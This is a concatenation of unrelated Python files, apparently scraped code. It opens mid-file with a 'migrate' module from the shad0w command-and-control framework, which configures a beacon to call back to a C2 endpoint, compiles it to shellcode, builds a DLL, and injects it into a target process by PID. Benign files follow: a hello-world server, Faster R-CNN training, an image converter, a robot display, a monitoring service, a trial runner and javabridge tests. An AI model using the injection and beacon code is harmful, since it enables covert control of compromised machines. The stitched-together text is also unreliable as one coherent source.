#define _C2_CALLBACK_PORT %s
#define _CALLBACK_USER_AGENT L"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36"
#define _CALLBACK_JITTER %s000
#define IMPERSONATE_SESSION "%s"
""" % (shad0w.endpoint, shad0w.addr[1], 1, shad0w.current_beacon)
buildtools.update_settings_file(None, custom_template=settings_template)
os = shad0w.beacons[shad0w.current_beacon]["os"]
arch = shad0w.beacons[shad0w.current_beacon]["arch"]
secure = shad0w.beacons[shad0w.current_beacon]["secure"]
buildtools.make_in_clone(arch=arch, platform=os, secure=secure, static=True)
return buildtools.extract_shellcode()
def format_shellcode(shellcode):
hshellcode = ""
code_size = len(shellcode)
for num, byte in enumerate(shellcode):
if num != code_size - 1:
hshellcode += f"{hex(byte)},"
else:
hshellcode += f"{hex(byte)}"
return hshellcode
def write_header(code, file_loc):
hex_code = format_shellcode(code)
TEMPLATE = """unsigned char beacon_bin[] = { %s };
unsigned int beacon_bin_len = %s;
"""
header = TEMPLATE % (hex_code, len(code))
with open(file_loc, 'w') as file:
file.write(header)
return
def get_dll_data(file_loc):
with open(file_loc, "rb") as file:
data = file.read()
return base64.b64encode(data).decode()
def generate_beacon_dll(shad0w, rcode):
# write header file
write_header(rcode, "/root/shad0w/modules/windows/shinject/beacon.h")
# build the dll
buildtools.clone_source_files(rootdir="/root/shad0w/modules/windows/shinject/", basedir="/root/shad0w/modules/windows/shinject/")
made = buildtools.make_in_clone(modlocation="/root/shad0w/modules/windows/shinject/module.dll", builddir=os.getcwd(), make_target="x64")
# check that the dll has built
if made is not True:
shad0w.debug.error("Error building migrate dll.")
return
# return the base64 dll data
return get_dll_data("/root/shad0w/modules/windows/shinject/module.dll")
def await_impersonate(shad0w, pid):
while True:
if shad0w.beacons[shad0w.current_beacon]["impersonate"] == None:
continue
else:
imp_beacon_id = shad0w.beacons[shad0w.current_beacon]["impersonate"]
shad0w.beacons[shad0w.current_beacon]["task"] = (0x6000, None)
shad0w.debug.log("Tasked beacon to die.", log=True)
shad0w.current_beacon = imp_beacon_id
break
shad0w.debug.good(f"Successfully migrated ({pid})")
return
def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
# usage examples
usage_examples = """
Examples:
migrate -p 8725
"""
# init argparse
parse = argparse.ArgumentParser(prog='migrate',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=usage_examples)
# keep it behaving nice
parse.exit = exit
parse.error = error
# set the args
parse.add_argument("-p", "--pid", required=True, help="PID to migrate to")
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:
pass
# show the errors to the user
if ERROR:
print(error_list)
parse.print_help()
return
# create the beacon
rcode = generate_beacon_code(shad0w)
# create the beacon dll
rcode = generate_beacon_dll(shad0w, rcode)
# make the json info
inject_info = build_inject_info(args, rcode)
# tell the beacon to execute the dll
shad0w.beacons[shad0w.current_beacon]["task"] = (DLLINJECT_EXEC_ID, inject_info)
# try to impersonate the new beacon
threading.Thread(target=await_impersonate, args=(shad0w, args.pid)).start()
return
|
hello-world-web-server-2.py
|
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
class HelloHTTPRequestHandler(BaseHTTPRequestHandler):
message = 'Hello World! 今日は'
def do_GET(self):
self.send_response(200)
self.send_header('Content-type', 'text/html; charset=UTF-8')
self.end_headers()
self.wfile.write(self.message.encode('utf-8'))
self.close_connection = True
def serve(addr, port):
with ThreadingHTTPServer((addr, port), HelloHTTPRequestHandler) as server:
server.serve_forever(poll_interval=None)
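# Design note: ThreadingHTTPServer (Python 3.7+) handles each request in its own thread,
# so one slow client does not block the rest. The server below runs in a daemon thread,
# which lets the process exit as soon as the main thread returns (e.g. after Ctrl+C in
# the input() loop) without an explicit server.shutdown().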
if __name__ == '__main__':
addr, port = ('localhost', 80)
threading.Thread(target=serve, args=(addr, port), daemon=True).start()
try:
while True:
# handle Ctrl+C
input()
except KeyboardInterrupt:
pass
|
train.py
|
#!/usr/bin/env python
# --------------------------------------------------------
# Faster R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Originally written by Rob Girshick. Adapted by Dennis Dam to
# use scenarios.
# --------------------------------------------------------
"""Train a Faster R-CNN network using alternating optimization.
This tool implements the alternating optimization algorithm described in our
NIPS 2015 paper ("Faster R-CNN: Towards Real-time Object Detection with Region
Proposal Networks." Shaoqing Ren, Kaiming He, Ross Girshick, Jian Sun.)
"""
import _init_paths
from fast_rcnn.train import get_training_roidb, train_net
from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list, get_output_dir
from datasets.factory import get_imdb
from rpn.generate import imdb_proposals
import argparse
import numpy as np
import sys, os
import multiprocessing as mp
from multiprocessing import Pool, TimeoutError
import cPickle
import shutil
from scenario import Scenario
import pprint
import GPUtil
def parse_args():
"""
Parse input arguments
"""
parser = argparse.ArgumentParser(description='Train a Faster R-CNN network')
parser.add_argument('scenario_file',
help='Path scenario file (e.g. /home/user/scenario.p)')
parser.add_argument('--gpus', dest='gpus',
                        help='Number of GPU cores',
default=1, type=int)
parser.add_argument('--cfg', dest='cfg_file',
help='optional config file',
default=None, type=str)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
def get_roidb(imdb_name, rpn_file=None):
imdb = get_imdb(imdb_name)
print 'Loaded dataset `{:s}` for training'.format(imdb.name)
imdb.set_proposal_method(cfg.TRAIN.PROPOSAL_METHOD)
print 'Set proposal method: {:s}'.format(cfg.TRAIN.PROPOSAL_METHOD)
if rpn_file is not None:
imdb.config['rpn_file'] = rpn_file
roidb = get_training_roidb(imdb)
return roidb, imdb
# ------------------------------------------------------------------------------
# Pycaffe doesn't reliably free GPU memory when instantiated nets are discarded
# (e.g. "del net" in Python code) . To work around this issue, each training
# stage is executed in a separate process using multiprocessing.Process.
# ------------------------------------------------------------------------------
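# A minimal sketch of the pattern used below (illustrative only): each stage runs in its
# own process and hands its result back through a multiprocessing queue, so the GPU
# memory held by pycaffe is reclaimed when the child exits, e.g.
#   mp_queue = mp.Queue()
#   p = mp.Process(target=train_rpn, kwargs=dict(queue=mp_queue, imdb_name=..., cfg=cfg))
#   p.start()
#   rpn_out = mp_queue.get()   # {'model_path': ...} put by train_rpn
#   p.join()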
def _init_caffe(cfg):
"""Initialize pycaffe in a training process.
"""
import caffe
# fix the random seeds (numpy and caffe) for reproducibility
np.random.seed(cfg.RNG_SEED)
caffe.set_random_seed(cfg.RNG_SEED)
# set up caffe
caffe.set_mode_gpu()
caffe.set_device(cfg.GPU_ID)
def train_rpn(queue=None, imdb_name=None, init_model=None, solver=None,
max_iters=None, cfg=None, output_dir=None):
"""Train a Region Proposal Network in a separate training process.
"""
# Not using any proposals, just ground-truth boxes
cfg.TRAIN.HAS_RPN = True
cfg.TRAIN.BBOX_REG = False # applies only to Fast R-CNN bbox regression
cfg.TRAIN.PROPOSAL_METHOD = 'gt'
cfg.TRAIN.IMS_PER_BATCH = 1
print 'Init model: {}'.format(init_model)
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
roidb, imdb = get_roidb(imdb_name)
# print 'first image: ',imdb.gt_roidb()
# print 'roidb len: {}'.format(len(roidb))
if output_dir==None:
output_dir = get_output_dir(imdb)
print 'Output will be saved to `{:s}`'.format(output_dir)
print 'len roidb=',len(roidb)
model_paths = train_net(solver, roidb, output_dir,
pretrained_model=init_model,
max_iters=max_iters)
# Cleanup all but the final model
for i in model_paths[:-1]:
os.remove(i)
rpn_model_path = model_paths[-1]
# Send final model path through the multiprocessing queue
queue.put({'model_path': rpn_model_path})
def rpn_generate_kw_wrapper(kwargs):
return rpn_generate(**kwargs)
def rpn_generate(queue=None, imdb_name=None, rpn_model_path=None, cfg=None,
rpn_test_prototxt=None, output_dir=None, part_id=None):
"""Use a trained RPN to generate proposals.
"""
cfg.TEST.RPN_PRE_NMS_TOP_N = -1 # no pre NMS filtering
cfg.TEST.RPN_POST_NMS_TOP_N = 2000 # limit top boxes after NMS
print 'RPN model: {}'.format(rpn_model_path)
print('Using config:')
pp = pprint.PrettyPrinter(depth=6)
pp.pprint(cfg)
import caffe
_init_caffe(cfg)
# NOTE: the matlab implementation computes proposals on flipped images, too.
# We compute them on the image once and then flip the already computed
# proposals. This might cause a minor loss in mAP (less proposal jittering).
imdb = get_imdb(imdb_name)
print 'Loaded dataset `{:s}` for proposal generation'.format(imdb.name)
# Load RPN and configure output directory
rpn_net = caffe.Net(rpn_test_prototxt, rpn_model_path, caffe.TEST)
if output_dir==None:
output_dir = get_output_dir(imdb)
print 'Output will be saved to `{:s}`'.format(output_dir)
# Generate proposals on the imdb
rpn_proposals = imdb_proposals(rpn_net, imdb)
# Write proposals to disk and send the proposal file path through the
# multiprocessing queue
rpn_net_name = os.path.splitext(os.path.basename(rpn_model_path))[0]
rpn_proposals_path = os.path.join(
output_dir, rpn_net_name + ('_'+part_id if part_id != None else '')+'_proposals.pkl')
with open(rpn_proposals_path, 'wb') as f:
cPickle.dump(rpn_proposals, f, cPickle.HIGHEST_PROTOCOL)
print 'Wrote RPN proposals to {}'.format(rpn_proposals_path)
queue.put({'proposal_path': rpn_proposals_path, 'rpn_net': rpn_net_name})
def train_fast_rcnn(queue=None, imdb_name=None, init_model=None, solver=None,
max_iters=None, cfg=None, rpn_file=None, output_dir=None):
"""Train a Fast R-CNN using proposals generated by an RPN.
"""
    cfg.TRAIN.HAS_RPN = False           # not generating proposals on-the-fly
cfg.TRAIN.PROPOSAL_METHOD = 'rpn' # use pre-computed RPN proposals instead
cfg.TRAIN.IMS_PER_BATCH = 1
print 'Init model: {}'.format(init_model)
print 'RPN proposals: {}'.format(rpn_file)
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
roidb, imdb = get_roidb(imdb_name, rpn_file=rpn_file)
if output_dir==None:
output_dir = get_output_dir(imdb)
print 'Output will be saved to `{:s}`'.format(output_dir)
# Train Fast R-CNN
model_paths = train_net(solver, roidb, output_dir,
pretrained_model=init_model,
max_iters=max_iters)
# Cleanup all but the final model
for i in model_paths[:-1]:
os.remove(i)
fast_rcnn_model_path = model_paths[-1]
# Send Fast R-CNN model path over the multiprocessing queue
if queue != None:
queue.put({'model_path': fast_rcnn_model_path})
def dir_exists_or_create(path):
    # create the directory if it does not already exist
if not os.path.exists(path):
try:
os.makedirs(path)
except OSError as exc: # Guard against race condition
pass
def join_pkls(proposal_paths, output_dir, rpn_net_name):
rpn_proposals=[]
for ppath in proposal_paths:
        with open(ppath, 'rb') as f:
            rpn_proposals += cPickle.load(f)
rpn_proposals_path=os.path.join(output_dir, rpn_net_name+'_proposals.pkl')
with open(rpn_proposals_path, 'wb') as f:
cPickle.dump(rpn_proposals, f, cPickle.HIGHEST_PROTOCOL)
return rpn_proposals_path
if __name__ == '__main__':
# first change current dir to py-faster-rcnn dir, or else scripts will break:
os.chdir(_init_paths.faster_rcnn_root)
print dir(mp)
args = parse_args()
print(args)
scenario=Scenario().load(args.scenario_file)
print "Using scenario:"
pprint.pprint(scenario.__dict__)
output_dir = os.path.join(scenario.scen_dir, 'output')
dir_exists_or_create(output_dir)
cfg.GPU_ID = scenario.gpu_id
# --------------------------------------------------------------------------
# Pycaffe doesn't reliably free GPU memory when instantiated nets are
# discarded (e.g. "del net" in Python code). To work around this issue, each
# training stage is executed in a separate process using
# multiprocessing.Process.
# --------------------------------------------------------------------------
    # queue for communicating results between processes
mp_queue = mp.Queue()
    # solvers, iters, etc. for each training stage
print '#'*25
print 'USING SCENARIO:'
print scenario.scenario
print '#'*25
max_iters = scenario.max_iters
cpu_count=mp.cpu_count()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 1 RPN, init from ImageNet model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
if scenario.config_path is not None:
cfg_from_file(scenario.config_path)
cfg.TRAIN.SNAPSHOT_INFIX = 'stage1'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=scenario.train_imdb,
init_model=scenario.weights_path,
solver=scenario.models['stage1_rpn_solver'],
max_iters=max_iters[0],
cfg=cfg, output_dir=output_dir)
p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
p.start()
rpn_stage1_out = mp_queue.get()
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 1 RPN, generate proposals'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
multi_gpu=False # disable for now
if multi_gpu:
parts = min(len(GPUtil.getGPUs()),cpu_count)
print 'Number of parts is',parts
pool=Pool(processes=parts)
def gpu_conf(cfg, gpu_id=None):
if gpu_id==None:
DEVICE_ID_LIST = GPUtil.getFirstAvailable()
if (len(DEVICE_ID_LIST) > 0):
cfg.GPU_ID = DEVICE_ID_LIST[0] # grab first element from list
else:
cfg.GPU_ID=gpu_id
return cfg
configs=[
dict(
imdb_name='%s_part_%dof%d' % (scenario.train_imdb, part_id, parts),
rpn_model_path=str(rpn_stage1_out['model_path']),
cfg=gpu_conf(cfg, part_id-1),
rpn_test_prototxt=scenario.models['rpn_test'],
output_dir=output_dir,
part_id=part_id
) for part_id in range(1,parts+1)
]
pprint.pprint(configs)
results=pool.map(rpn_generate_kw_wrapper, configs)
# rpn_net = ''
# for p in processes:
# p.start()
# passed_vars = mp_queue.get()
# rpn_net = passed_vars['rpn_net']
# proposal_paths.append(passed_vars['proposal_path'])
#
# for p in processes:
# p.join()
#
# aggregated_proposal_path = join_pkls(proposal_paths, output_dir, rpn_net)
else:
mp_kwargs = dict(
queue=mp_queue,
imdb_name=scenario.train_imdb,
rpn_model_path=str(rpn_stage1_out['model_path']),
cfg=cfg,
rpn_test_prototxt=scenario.models['rpn_test'],
output_dir=output_dir
)
p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
p.start()
rpn_stage1_out['proposal_path'] = mp_queue.get()['proposal_path']
p.join()
# processes=[]
# proposal_paths=[]
# base_dict=
# for i in range(0, parts):
#
#
# part_id='%dof%d'%(i+1, parts)
# mp_kwargs = dict(
# queue=mp_queue,
# imdb_name= '%s_part_%s'%(scenario.train_imdb, part_id),
# rpn_model_path=str(rpn_stage1_out['model_path']),
# cfg=cfg,
# rpn_test_prototxt=scenario.models['rpn_test'],
# output_dir = output_dir,
# part_id=part_id
#
# )
#
# processes.append(mp.Process(target=rpn_generate, kwargs=mp_kwargs))
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 1 Fast R-CNN using RPN proposals, init from ImageNet model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
cfg.TRAIN.SNAPSHOT_INFIX = 'stage1'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=scenario.train_imdb,
init_model=scenario.weights_path,
solver=scenario.models['stage1_fast_rcnn_solver'],
max_iters=max_iters[1],
cfg=cfg,
rpn_file=rpn_stage1_out['proposal_path'], output_dir=output_dir)
p = mp.Process(target=train_fast_rcnn, kwargs=mp_kwargs)
p.start()
fast_rcnn_stage1_out = mp_queue.get()
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 2 RPN, init from stage 1 Fast R-CNN model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
cfg.TRAIN.SNAPSHOT_INFIX = 'stage2'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=scenario.train_imdb,
init_model=str(fast_rcnn_stage1_out['model_path']),
solver=scenario.models['stage2_rpn_solver'],
max_iters=max_iters[2],
cfg=cfg, output_dir=output_dir)
p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
p.start()
rpn_stage2_out = mp_queue.get()
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 2 RPN, generate proposals'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=scenario.train_imdb,
rpn_model_path=str(rpn_stage2_out['model_path']),
cfg=cfg,
rpn_test_prototxt=scenario.models['rpn_test'], output_dir=output_dir)
p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
p.start()
rpn_stage2_out['proposal_path'] = mp_queue.get()['proposal_path']
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 2 Fast R-CNN, init from stage 2 RPN R-CNN model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
cfg.TRAIN.SNAPSHOT_INFIX = 'stage2'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=scenario.train_imdb,
init_model=str(rpn_stage2_out['model_path']),
solver=scenario.models['stage2_fast_rcnn_solver'],
max_iters=max_iters[3],
cfg=cfg,
rpn_file=rpn_stage2_out['proposal_path'], output_dir=output_dir)
p = mp.Process(target=train_fast_rcnn, kwargs=mp_kwargs)
p.start()
fast_rcnn_stage2_out = mp_queue.get()
p.join()
# Create final model (just a copy of the last stage)
final_path = scenario.net_final_path
print 'cp {} -> {}'.format(
fast_rcnn_stage2_out['model_path'], final_path)
shutil.copy(fast_rcnn_stage2_out['model_path'], final_path)
print 'Final model: {}'.format(final_path)
|
commandlinesolution.py
|
import sys
import threading
from queue import Queue
import os
import time
import cv2
def task(filename,inp,out):
check = cv2.imread(f'./{inp}/{filename}')
gray = cv2.cvtColor(check,cv2.COLOR_BGR2GRAY)
cv2.imwrite(f'./{out}/{filename}',gray)
# Function to send task to threads
def do_stuff(q,inp,out):
while not q.empty():
value = q.get()
task(value,inp,out)
q.task_done()
arguments = sys.argv
if len(arguments) != 4 :
print("""Format :
py <script.name>.py inputdir outputdir no_of_threads
""")
else:
    inputDir = arguments[1]
    outputDir = arguments[2]
    threads = int(arguments[3])
    # Loop For Number of Threads
    t = threads
    jobs = Queue()
    os.makedirs(outputDir, exist_ok=True)
    for elem in os.listdir(inputDir):
        jobs.put(elem)
    start = time.time()
    for i in range(t):
        worker = threading.Thread(target=do_stuff, args=(jobs, inputDir, outputDir))
        worker.start()
jobs.join()
end = time.time()
print("Time Taken", end - start)
print("Finished.....")
|
display.py
|
from pepper.framework import AbstractComponent
from pepper.framework.component import FaceRecognitionComponent, ObjectDetectionComponent
from .server import DisplayServer
from threading import Thread, Lock
from PIL import Image
from io import BytesIO
import base64
import json
class DisplayComponent(AbstractComponent):
def __init__(self, backend):
super(DisplayComponent, self).__init__(backend)
server = DisplayServer()
server_thread = Thread(target=server.start)
server_thread.daemon = True
server_thread.start()
lock = Lock()
self._display_info = {}
def encode_image(image):
"""
Parameters
----------
image: Image.Image
Returns
-------
base64: str
Base64 encoded PNG string
"""
with BytesIO() as png:
image.save(png, 'png')
png.seek(0)
return base64.b64encode(png.read())
def on_image(image, orientation):
with lock:
if self._display_info:
server.update(json.dumps(self._display_info))
self._display_info = {
"hash": hash(str(image)),
"img": encode_image(Image.fromarray(image)),
"items": []
}
def add_items(items):
if self._display_info:
with lock:
self._display_info["items"] += [
{"name": item.name,
"confidence": item.confidence,
"bounds": item.bounds.to_list()
} for item in items]
face_recognition = self.require(DisplayComponent, FaceRecognitionComponent) # type: FaceRecognitionComponent
object_recognition = self.require(DisplayComponent, ObjectDetectionComponent) # type: ObjectDetectionComponent
self.backend.camera.callbacks += [on_image]
face_recognition.on_face_known_callbacks += [lambda faces: add_items(faces)]
object_recognition.on_object_callbacks += [lambda image, objects: add_items(objects)]
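
# Hedged sketch (editorial addition, not part of the original component): the encode/decode
# round trip used by encode_image above, shown standalone with a tiny solid-colour image.
def _example_encode_roundtrip():
    img = Image.new("RGB", (4, 4), color=(255, 0, 0))
    with BytesIO() as png:
        img.save(png, 'png')
        png.seek(0)
        encoded = base64.b64encode(png.read())
    decoded = Image.open(BytesIO(base64.b64decode(encoded)))
    print(decoded.size, decoded.mode)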
|
process.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: leeyoshinari
import time
import json
import threading
import influxdb
from logger import logger, cfg, handle_exception
from request import Request
class Process(object):
def __init__(self):
self.request = Request()
self._agents = {'ip': [], 'port': [], 'system': [], 'cpu': [], 'mem': [], 'time': [], 'disk': [], 'nic': [],
'network_speed': [], 'disk_size': [], 'mem_usage': [], 'cpu_usage': [], 'disk_usage': []}
# data expiration time
conn = influxdb.InfluxDBClient(cfg.getInflux('host'), cfg.getInflux('port'), cfg.getInflux('username'),
cfg.getInflux('password'), cfg.getInflux('database'))
conn.query(f'alter retention policy "autogen" on "{cfg.getInflux("database")}" duration '
f'{cfg.getInflux("expiryTime")}d REPLICATION 1 SHARD DURATION {cfg.getInflux("shardDuration")} default;')
logger.info(f'Data expiration time is {cfg.getInflux("expiryTime")} days')
t = threading.Thread(target=self.check_status, args=()) # Check the online status of the clients.
t.start()
@property
def agents(self):
return self._agents
@agents.setter
def agents(self, value):
logger.debug(f'The client registration data is {value}')
ip = value['host']
if ip in self._agents['ip']:
ind = self._agents['ip'].index(ip)
self._agents['cpu_usage'][ind] = value['cpu_usage']
self._agents['mem_usage'][ind] = value['mem_usage']
self._agents['disk_usage'][ind] = value['disk_usage']
self._agents['time'][ind] = time.time()
            logger.info(f'{ip} server is already registered, status updated.')
else:
self._agents['ip'].append(value['host'])
self._agents['port'].append(value['port'])
self._agents['system'].append(value['system'])
self._agents['cpu'].append(value['cpu'])
self._agents['mem'].append(value['mem'])
self._agents['time'].append(time.time())
self._agents['disk'].append(value['disks'].split(','))
self._agents['nic'].append(value['nic'])
self._agents['disk_size'].append(value['disk_size'])
self._agents['network_speed'].append(value['network_speed'])
self._agents['cpu_usage'].append((value['cpu_usage']))
self._agents['mem_usage'].append((value['mem_usage']))
self._agents['disk_usage'].append((value['disk_usage']))
logger.info(f'{ip} server registered successfully!')
def check_status(self):
"""
Check the online status of the clients, and remove it when offline.
:return:
"""
while True:
time.sleep(5)
for i in range(len(self._agents['ip'])):
if time.time() - self._agents['time'][i] > 12:
ip = self._agents['ip'].pop(i)
self._agents['port'].pop(i)
self._agents['system'].pop(i)
self._agents['cpu'].pop(i)
self._agents['mem'].pop(i)
self._agents['time'].pop(i)
self._agents['disk'].pop(i)
self._agents['nic'].pop(i)
self._agents['network_speed'].pop(i)
self._agents['disk_size'].pop(i)
self._agents['cpu_usage'].pop(i)
self._agents['mem_usage'].pop(i)
self._agents['disk_usage'].pop(i)
logger.warning(f"The client server {ip} is in an abnormal state, and has been offline.")
break
@handle_exception(is_return=True, default_value=[-1, -1, -1, -1, '-', -1])
def get_gc(self, ip, port, interface):
"""
Get GC data of port
        :param ip: client IP
:param port: client monitoring port
:param interface: interface
:return:
"""
res = self.request.request('get', ip, port, interface)
if res.status_code == 200:
response = json.loads(res.content.decode())
logger.debug(f'The GC data of the port {port} of the server {ip} is {response}')
if response['code'] == 0:
return response['data']
else:
logger.error(response['msg'])
return [-1, -1, -1, -1, '-', -1]
else:
logger.error(f'The response status code of getting GC data of the '
f'port {port} of the server {ip} is {res.status_code}.')
return [-1, -1, -1, -1, '-', -1]
@handle_exception(is_return=True, default_value={'host': [], 'port': [], 'pid': [], 'isRun': [], 'startTime': []})
def get_monitor(self, host=None):
"""
Get the list of monitoring ports.
:return:
"""
monitor_list = {'host': [], 'port': [], 'pid': [], 'isRun': [], 'startTime': []}
if host:
post_data = {
'host': host,
}
port = self._agents['port'][self._agents['ip'].index(host)]
res = self.request.request('post', host, port, 'getMonitor', json=post_data)
if res.status_code == 200:
response = json.loads(res.content.decode())
logger.debug(f'The return value of server {host} of getting monitoring list is {response}.')
if response['code'] == 0:
monitor_list['host'] += response['data']['host']
monitor_list['port'] += response['data']['port']
monitor_list['pid'] += response['data']['pid']
monitor_list['isRun'] += response['data']['isRun']
monitor_list['startTime'] += response['data']['startTime']
else:
for ip, port in zip(self._agents['ip'], self._agents['port']): # Traverse all clients IP addresses
post_data = {
'host': ip,
}
try:
res = self.request.request('post', ip, port, 'getMonitor', json=post_data)
if res.status_code == 200:
response = json.loads(res.content.decode())
logger.debug(f'The return value of server {ip} of getting monitoring list is {response}')
if response['code'] == 0:
monitor_list['host'] += response['data']['host']
monitor_list['port'] += response['data']['port']
monitor_list['pid'] += response['data']['pid']
monitor_list['isRun'] += response['data']['isRun']
monitor_list['startTime'] += response['data']['startTime']
except Exception as err:
logger.error(err)
continue
return monitor_list
|
builtin.py
|
import bisect
import copy
import datetime
import functools
from queue import Empty as EmptyQueueException
from multiprocessing import Queue, Process
from typing import Any, Callable, Dict, Optional, Tuple
def callback(queue, **kwargs):
kwargs['callback_timestamp'] = str(datetime.datetime.utcnow())
queue.put(kwargs)
class Trial:
""" A trial represent an experience in progress, it holds all the necessary information to stop it if it is
in progress or resume it if it was suspended """
    def __init__(self, id: str, task: Callable[[Dict[str, Any]], None], params: Dict[str, Any], queue: Queue):
self.id = id
self.task = task
self.params = copy.deepcopy(params)
self.kwargs = params
self.queue: Queue = queue
self.kwargs['callback'] = functools.partial(callback, queue=queue)
self.process: Optional[Process] = None
self.latest_results = None
self._timestamps = []
self.results = []
self.insert_timestamp('creation')
@property
def timestamps(self):
return self._timestamps
def is_alive(self) -> bool:
return self.process and self.process.is_alive()
def has_finished(self) -> bool:
return self.latest_results and self.latest_results[-1].get('finished')
def is_suspended(self) -> bool:
return self.process is None and not self.has_finished()
def start(self) -> None:
""" start or resume a process if it is not already running"""
if not self.is_alive():
self.process = Process(target=self.task, kwargs=self.kwargs)
self.process.start()
self.insert_timestamp('start')
def stop(self, safe=False) -> None:
""" stop the trial in progress if safe is true it will wait until the process exit """
if self.process:
self.process.terminate()
self.insert_timestamp('stop')
if safe:
self.process.join()
self.process = None
    def get_last_results(self) -> Tuple[Dict[str, Any], ...]:
""" return the last non null result that was received """
return self.latest_results
    def receive(self) -> Optional[Tuple[Dict[str, Any], ...]]:
""" check if results are ready, if not return None.
This function can return multiple results if it has not been called in a long time """
obs = []
while True:
try:
obs.append(self.queue.get(True, timeout=0.01))
except EmptyQueueException:
if len(obs) == 0:
return None
self.latest_results = tuple(obs)
return tuple(obs)
def insert_timestamp(self, name, time=None):
if time is None:
time = str(datetime.datetime.utcnow())
idx = bisect.bisect_left([t[1] for t in self._timestamps], time)
self._timestamps.insert(idx, (name, time))
def to_dict(self):
return {
'results': self.results,
'timestamps': self.timestamps,
'params': self.params,
'id': self.id
}
def build(id: str, task: Callable[[Dict[str, Any]], None], params: Dict[str, Any], queue: Queue,
          **kwargs):
return Trial(id, task, params, queue)
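
# Hedged usage sketch (editorial addition, not part of the original module): a toy task that
# reports progress through the injected `callback`, driven end to end by a Trial. All names
# below are illustrative only.
def _example_task(callback, steps=3, **_):
    for step in range(steps):
        callback(step=step, value=step * 0.1, finished=(step == steps - 1))


if __name__ == '__main__':
    q = Queue()
    trial = build('trial-0', _example_task, {'steps': 3}, q)
    trial.start()
    while not trial.has_finished():
        results = trial.receive()
        if results:
            print(results)
    trial.stop(safe=True)
    print(trial.to_dict())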
|
test_jutil.py
|
'''test_jutil.py - test the high-level interface
python-javabridge is licensed under the BSD license. See the
accompanying file LICENSE for details.
Copyright (c) 2003-2009 Massachusetts Institute of Technology
Copyright (c) 2009-2013 Broad Institute
All rights reserved.
'''
import gc
import os
import numpy as np
import threading
import unittest
import sys
import javabridge
# Monkey patch some half-correct implementations of methods that only
# appeared in Python 2.7.
if not hasattr(unittest.TestCase, 'assertIn'):
unittest.TestCase.assertIn = lambda self, a, b: self.assertTrue(a in b)
if not hasattr(unittest.TestCase, 'assertNotIn'):
unittest.TestCase.assertNotIn = lambda self, a, b: self.assertTrue(a not in b)
if not hasattr(unittest.TestCase, 'assertSequenceEqual'):
    unittest.TestCase.assertSequenceEqual = lambda self, a, b: self.assertTrue(all(aa == bb for aa, bb in zip(a, b)))
class TestJutil(unittest.TestCase):
def setUp(self):
self.env = javabridge.attach()
def tearDown(self):
javabridge.detach()
def test_01_01_to_string(self):
jstring = self.env.new_string_utf("Hello, world")
self.assertEqual(javabridge.to_string(jstring), "Hello, world")
def test_01_02_make_instance(self):
jobject = javabridge.make_instance("java/lang/Object", "()V")
self.assertTrue(javabridge.to_string(jobject).startswith("java.lang.Object"))
def test_01_03_call(self):
jstring = self.env.new_string_utf("Hello, world")
self.assertEqual(javabridge.call(jstring, "charAt", "(I)C", 0), "H")
def test_01_03_01_static_call(self):
result = javabridge.static_call("Ljava/lang/String;", "valueOf",
"(I)Ljava/lang/String;",123)
self.assertEqual(result, "123")
def test_01_04_make_method(self):
env = self.env
class String(object):
def __init__(self):
self.o = env.new_string_utf("Hello, world")
charAt = javabridge.make_method("charAt", "(I)C", "My documentation")
s = String()
self.assertEqual(s.charAt.__doc__, "My documentation")
self.assertEqual(s.charAt(0), "H")
def test_01_05_00_get_static_field(self):
klass = self.env.find_class("java/lang/Short")
self.assertEqual(javabridge.get_static_field(klass, "MAX_VALUE", "S"), 2**15 - 1)
def test_01_05_01_no_field_for_get_static_field(self):
def fn():
javabridge.get_static_field(
'java/lang/Object', "NoSuchField", "I")
self.assertRaises(javabridge.JavaException, fn)
